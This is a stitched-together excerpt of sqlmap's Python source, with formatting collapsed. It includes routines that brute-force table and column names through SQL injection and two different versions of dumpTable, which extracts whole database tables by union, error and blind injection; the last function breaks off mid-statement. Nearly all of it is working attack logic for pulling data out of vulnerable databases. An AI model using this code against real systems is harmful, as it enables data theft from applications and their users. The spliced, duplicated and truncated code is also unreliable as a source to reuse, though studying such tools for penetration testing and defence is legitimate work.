logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common columns (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % columnFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common columns file location?\n" columnFile = readInput(message) or columnFile infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.value = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.value: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.isDbms(DBMS.ORACLE): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True) else: kb.data.cachedColumns = foundData try: kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue colList = sorted( filter( None, kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)].keys())) colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colString infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming( tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) entriesCount = 0 if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % ( colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION]. where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, blind=False) if retVal: entries, _ = retVal entries = zip( *[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.inband.query % ( colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) if not entries and query: entries = inject.getValue(query, blind=False, time=False, dump=True) if not isNoneValue(entries): if isinstance(entries, basestring): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = { "length": len(column), "values": BigArray() } for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, basestring): colEntry = entry else: colEntry = unArrayizeValue( entry[index] ) if index < len(entry) else u'' _ = len( DUMP_REPLACEMENTS.get( getUnicode(colEntry), getUnicode(colEntry))) maxLen = max(len(column), _) if maxLen > kb.data.dumpedTable[column][ "length"]: kb.data.dumpedTable[column][ "length"] = maxLen kb.data.dumpedTable[column]["values"].append( colEntry) if not kb.data.dumpedTable and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colString infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % ( tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl else: query = rootQuery.blind.count % (conf.db, tbl) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming( conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colString warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): if Backend.isDbms(DBMS.ACCESS): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, count, blind=True) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, dump=True, plusOne=plusOne) if len(colList) < len( indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % ( column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query % ( column, conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % ( column, column, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % ( column, tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % ( index, column, tbl) value = NULL if column in emptyColumns else inject.getValue( query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)) lengths[column] = max( lengths[column], len(_)) entries[column].append(value) except KeyboardInterrupt: clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = { "length": length, "values": columnEntries } entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colString warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'%s" % ( unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = { "count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db) } attackDumpedTable() conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, e: errMsg = "connection exception detected in dumping phase: " errMsg += "'%s'" % e logger.critical(errMsg) finally:
def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common tables (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % tableFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common tables file location?\n" tableFile = readInput(message) or tableFile infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.value = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.value: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.value): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming( conf.db) singleTimeLogMessage(infoMsg) return conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = list(six.itervalues(kb.data.cachedTables)) if tblList and isListLike(tblList[0]): tblList = tblList[0] elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) else: return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: if kb.dumpKeyboardInterrupt: break if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None: infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming( tbl) singleTimeLogMessage(infoMsg) continue conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: if Backend.isDbms(DBMS.INFORMIX): kb.dumpTable = "%s:%s" % (conf.db, tbl) else: kb.dumpTable = "%s.%s" % (conf.db, tbl) if safeSQLIdentificatorNaming( conf.db ) not in kb.data.cachedColumns or safeSQLIdentificatorNaming( tbl, True ) not in kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db )] or not kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue columns = kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(column for column in columns if column) if conf.exclude: colList = [ _ for _ in colList if re.search(conf.exclude, _, re.I) is None ] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) warnMsg += " (no usable column names)" logger.warn(warnMsg) continue kb.dumpColumns = [ unsafeSQLIdentificatorNaming(_) for _ in colList ] colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming( tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) entriesCount = 0 if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.inband.query % ( colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION]. where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) if Backend.isDbms( DBMS.MSSQL) and not conf.forcePivoting: warnMsg = "in case of table dumping problems (e.g. column entry order) " warnMsg += "you are advised to rerun with '--force-pivoting'" singleTimeWarnMessage(warnMsg) query = rootQuery.blind.count % table query = agent.whereQuery(query) count = inject.getValue( query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): try: indexRange = getLimitRange( count, plusOne=True) for index in indexRange: row = [] for column in colList: query = rootQuery.blind.query3 % ( column, column, table, index) query = agent.whereQuery(query) value = inject.getValue( query, blind=False, time=False, dump=True) or "" row.append(value) if not entries and isNoneValue( row): break entries.append(row) except KeyboardInterrupt: kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if isNoneValue( entries) and not kb.dumpKeyboardInterrupt: try: retVal = pivotDumpTable(table, colList, blind=False) except KeyboardInterrupt: retVal = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if retVal: entries, _ = retVal entries = BigArray( _zip(*[ entries[colName] for colName in colList ])) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE): query = rootQuery.inband.query % ( colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) query = agent.whereQuery(query) if not entries and query and not kb.dumpKeyboardInterrupt: try: entries = inject.getValue(query, blind=False, time=False, dump=True) except KeyboardInterrupt: entries = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if not isNoneValue(entries): if isinstance(entries, six.string_types): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = { "length": len(column), "values": BigArray() } for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, six.string_types): colEntry = entry else: colEntry = unArrayizeValue( entry[index] ) if index < len(entry) else u'' maxLen = max( getConsoleLength(column), getConsoleLength( DUMP_REPLACEMENTS.get( getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column][ "length"]: kb.data.dumpedTable[column][ "length"] = maxLen kb.data.dumpedTable[column]["values"].append( colEntry) if not kb.data.dumpedTable and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colNames infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.count % ( tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming( conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI): if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.INFORMIX): table = "%s:%s" % (conf.db, tbl) if Backend.isDbms( DBMS.MSSQL) and not conf.forcePivoting: warnMsg = "in case of table dumping problems (e.g. column entry order) " warnMsg += "you are advised to rerun with '--force-pivoting'" singleTimeWarnMessage(warnMsg) try: indexRange = getLimitRange(count, plusOne=True) for index in indexRange: for column in colList: query = rootQuery.blind.query3 % ( column, column, table, index) query = agent.whereQuery(query) value = inject.getValue( query, union=False, error=False, dump=True) or "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() lengths[column] = max( lengths[column], len( DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if not entries and not kb.dumpKeyboardInterrupt: try: retVal = pivotDumpTable(table, colList, count, blind=True) except KeyboardInterrupt: retVal = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms( ) in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len( indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: debugMsg = "checking for empty columns" logger.debug(infoMsg) for column in colList: if not inject.checkBooleanExpression( "(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % ( column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, ): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.getIdentifiedDbms() in ( DBMS.MIMERSQL, ): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.SQLITE, DBMS.EXTREMEDB): query = rootQuery.blind.query % ( agent.preprocessField( tbl, column), tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % ( index, agent.preprocessField(tbl, column), tbl) elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % ( index, agent.preprocessField( tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) elif Backend.isDbms(DBMS.FRONTBASE): query = rootQuery.blind.query % ( index, agent.preprocessField( tbl, column), conf.db, tbl) else: query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), conf.db, tbl, index) query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue( query, union=False, error=False, dump=True) value = '' if value is None else value lengths[column] = max( lengths[column], len( DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = { "length": length, "values": columnEntries } entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'%s" % ( unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = { "count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db) } try: attackDumpedTable() except 